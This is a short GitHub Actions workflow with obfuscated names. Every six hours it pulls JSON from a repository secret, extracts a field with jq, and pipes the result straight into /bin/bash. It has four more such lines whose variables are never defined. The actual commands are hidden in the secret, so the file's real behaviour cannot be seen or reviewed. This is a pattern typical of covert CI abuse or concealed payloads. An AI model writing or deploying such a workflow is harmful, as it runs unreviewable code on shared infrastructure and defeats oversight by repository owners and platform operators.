name: chengzhuangshi6789
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengzhuangshi6789
        env:
          nshq826: ${{ secrets.nshq826 }}
        run: |
          echo $nshq826 | jq -r .lyk63569 | /bin/bash
          echo $y520 | jq -r .o67983 | /bin/bash
          echo $ovxj886 | jq -r .s95715 | /bin/bash
          echo $i090 | jq -r .x492 | /bin/bash
          echo $tx90 | jq -r .ad839 | /bin/bash

